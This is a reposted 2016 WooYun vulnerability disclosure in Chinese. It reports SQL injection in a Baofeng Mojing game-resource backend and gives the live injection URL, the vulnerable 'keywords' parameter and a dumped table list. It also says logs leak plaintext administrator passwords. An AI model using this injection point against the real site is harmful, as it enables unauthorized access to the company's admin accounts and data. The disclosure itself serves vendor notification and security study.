暴风魔镜某后台SQL注入(涉及管理员明文密码)

admin
admin
admin
140966
文章
117
评论
2017年4月29日03:16:11评论238 views字数 243阅读0分48秒阅读模式
摘要

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

漏洞概要 关注数(10) 关注此漏洞

缺陷编号: WooYun-2016-204893

漏洞标题: 暴风魔镜某后台SQL注入(涉及管理员明文密码)

相关厂商: mojing.cn

漏洞作者: [email protected]

提交时间: 2016-05-04 13:37

公开时间: 2016-06-18 14:10

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: php+字符类型注射 Mysql

0人收藏

漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

简要描述:

RT

详细说明:

注入点:http://azss2resource.game.mojing.cn/?keywords=1&page=1

keywords参数注入

暴风魔镜某后台SQL注入(涉及管理员明文密码)

表信息,管理员基本都是弱口令

而且log里面还泄露明文密码....

暴风魔镜某后台SQL注入(涉及管理员明文密码)

code 区域 
Database: androidgamescms2
 +-----------------------------+---------+
 | Table                       | Entries |
 +-----------------------------+---------+
 | logadmin_201603             | 180     |
 | mjadmin_resource_desc       | 172     |
 | logadmin_201511             | 150     |
 | mjadmin_resource_desc_copy1 | 141     |
 | mjadmin_resource_desc_copy2 | 141     |
 | logadmin_201512             | 102     |
 | logadmin_201601             | 92      |
 | logadmin_201604             | 88      |
 | mjadmin_resource_desc_copy  | 80      |
 | ci_sessions                 | 68      |
 | logadmin_201510             | 54      |
 | func                        | 52      |
 | logadmin_201602             | 11      |
 | gamesspecil                 | 8       |
 | typename                    | 8       |
 | gamebigtype                 | 5       |
 | gamesindex                  | 5       |
 | admin                       | 4       |
 | gamesspecil_er              | 3       |
 | reclassify                  | 2       |
 | role                        | 2       |
 | gamespic                    | 1       |
 | gamesspecidetail            | 1       |
 | gamesspecidetail_er         | 1       |
 | gamesspecil_san             | 1       |
 +-----------------------------+---------+

log日志泄露后台地址和明文密码

暴风魔镜某后台SQL注入(涉及管理员明文密码)

管理员密码

暴风魔镜某后台SQL注入(涉及管理员明文密码)

漏洞证明:

.

修复方案:

暴风魔镜某后台SQL注入(涉及管理员明文密码)

版权声明:转载请注明来源 [email protected]@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-04 14:05

厂商回复:

感谢您提交的漏洞,我们会尽快修复。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin